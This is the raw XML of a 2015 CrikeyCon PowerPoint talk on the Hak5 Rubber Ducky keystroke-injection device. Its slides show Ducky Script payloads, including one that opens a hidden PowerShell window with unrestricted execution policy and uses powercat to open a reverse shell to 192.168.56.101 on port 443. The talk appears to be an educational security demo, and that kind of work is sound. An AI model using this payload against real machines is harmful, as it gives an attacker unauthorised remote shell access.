              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DELAY 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STRING Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CrikeyCON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STRING Back Once Again it's the Renegade Drop Bear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STRING In a hazy post-G20 dystopia, a small and dishevelled group emerges from the ashes of Bris Vegas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STRING This battle hardened core gaze upon the ruins of this once great city, and vow to rebuild, in the only way they know STRING how... by making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CrikeyCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2015 bigger and better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272048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618187"/>
            <a:ext cx="9905998" cy="5409126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DELAY 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CAPSLOCK </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GUI R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DELAY 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STRING powershell.exe -ex unrestricted -c "Import-Module ('{0}:\powercat.ps1' -f (Get-Volume -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FileSystemLabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ducky).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>driveletter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powercat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.56.101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p 443 -ep" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowStyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Hidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181716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Links and Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Twitter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>kjacobsen</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Website: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://poshsecurity.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Hak5 Shop: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>j.mp/18ELmH0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Hak5 Ducky Forums:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>j.mp/1D15dvw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Hak5 Project Wiki: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>j.mp/1LyNZJB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>Ducky Decode (Firmware/Encoder/Doco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>j.mp/1Dknguj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Duck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>Toolkit (Encoder/Generator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>j.mp/168aIv7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Simple Ducky Payload Generator:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://j.mp/168aDYs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>j.mp/1yYJEFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1812248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5AF2EF84F1849AC79768B27E72E57" ma:contentTypeVersion="1" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a78a12a937ab927c949ca9c6ff6fd9f3">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b7fc5109-6c1c-4adf-9fb8-7f20c61818c1" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="69e47aa331b5df00074c041c8e758958" ns3:_="">
    <xsd:import namespace="b7fc5109-6c1c-4adf-9fb8-7f20c61818c1"/>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c5109-6c1c-4adf-9fb8-7f20c61818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0BE1E5-E645-4C85-9840-BBCA53D58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c5109-6c1c-4adf-9fb8-7f20c61818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627C88-DC1A-4843-90C8-D8AC6CC57C95}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0E78C218-2BDF-4996-BEDA-23387ABD6A21}">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b7fc5109-6c1c-4adf-9fb8-7f20c61818c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TM03457485[[fn=Mesh]]</Template>
  <TotalTime>510</TotalTime>
  <Words>1545</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>104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Lucida Console</vt:lpstr>
      <vt:lpstr>Mesh</vt:lpstr>
      <vt:lpstr>Fun with the HaK5 Rubber Ducky</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>Payload development</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Links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with the HaK5 Rubber Ducky</dc:title>
  <dc:creator>Kieran Jacobsen</dc:creator>
  <cp:lastModifiedBy>Kieran Jacobsen</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-31T12:46:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-02-11T10:09:52Z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0x0101003D25AF2EF84F1849AC79768B27E72E57</vt:lpwstr>
  </property>
</Properties>
</file>